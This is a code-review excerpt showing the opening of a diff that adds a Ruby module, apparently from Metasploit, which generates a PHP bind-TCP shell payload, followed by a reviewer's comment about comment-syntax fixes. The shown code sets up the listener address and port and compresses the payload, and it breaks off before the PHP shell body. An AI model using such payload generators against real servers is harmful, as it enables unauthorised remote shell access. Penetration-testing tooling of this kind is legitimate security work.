lib/msf/core/payload/php/bind_tcp.rb

```diff
@@ -0,0 +1,123 @@
+
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/php/send_uuid'
+
+module Msf
+
+###
+#
+# Complex bind_tcp payload generation for PHP
+#
+###
+
+module Payload::Php::BindTcp
+
+  include Msf::Payload::Php
+  include Msf::Payload::Php::SendUUID
+
+  #
+  # Generate the first stage
+  #
+  def generate
+    conf = {
+      port: datastore['LPORT']
+    }
+
+    php = super + generate_bind_tcp(conf)
+    php.gsub!(/#.*$/, '')
+    Rex::Text.compress(php)
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  def use_ipv6
+    false
+  end
+
+  def transport_config(opts={})
+    transport_config_bind_tcp(opts)
+  end
+
+  def generate_bind_tcp(opts={})
+    ipf = 'AF_INET'
+    ip = '0.0.0.0'
+    if use_ipv6
+      ipf << "6"
+      ip = '[::]'
+    end
+
+    php = %Q^//<?php
```

Comment:
The first comment here was changed from `#` to `//` because it was being stripped out by the `gsub` calls used in various locations and was resulting in invalid payloads. This is done in a couple of other spots too.